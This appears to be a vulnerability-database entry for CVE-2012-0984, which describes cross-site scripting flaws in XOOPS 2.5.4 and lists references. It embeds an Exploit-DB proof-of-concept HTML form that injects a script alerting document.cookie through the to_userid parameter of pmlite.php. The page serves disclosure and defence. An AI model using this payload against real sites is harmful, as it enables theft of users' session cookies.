CVE-2012-0984
Description
Multiple cross-site scripting (XSS) vulnerabilities in XOOPS before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via the (1) to_userid parameter to modules/pm/pmlite.php or the (2) current_file, (3) imgcat_id, or (4) target parameter to class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53143/info
XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
XOOPS 2.5.4 is vulnerable; other versions may be affected.
<form action='http://www.example.com/modules/pm/pmlite.php' method="post">
<input type="hidden" name="sendmod" value='1'>
<input type="hidden" name="to_userid" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>
XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Cross-Site Scripting Vulnerabilities
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
References
- http://archives.neohapsis.com/archives/bugtraq/2012-04/0128.html
- http://osvdb.org/81212
- http://osvdb.org/81213
- http://packetstormsecurity.org/files/111958/XOOPS-2.5.4-Cross-Site-Scripting.html
- http://secunia.com/advisories/48887
- http://www.exploit-db.com/exploits/18753
- http://www.securityfocus.com/bid/53143
- http://xoops.org/modules/news/article.php?storyid=6284
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75024
- https://www.htbridge.com/advisory/multiple_vulnerabilities_in_xoops.html
- http://archives.neohapsis.com/archives/bugtraq/2012-04/0128.html
- http://osvdb.org/81212
- http://osvdb.org/81213
- http://packetstormsecurity.org/files/111958/XOOPS-2.5.4-Cross-Site-Scripting.html
- http://secunia.com/advisories/48887
- http://www.exploit-db.com/exploits/18753
- http://www.securityfocus.com/bid/53143
- http://xoops.org/modules/news/article.php?storyid=6284
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75024
- https://www.htbridge.com/advisory/multiple_vulnerabilities_in_xoops.html
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.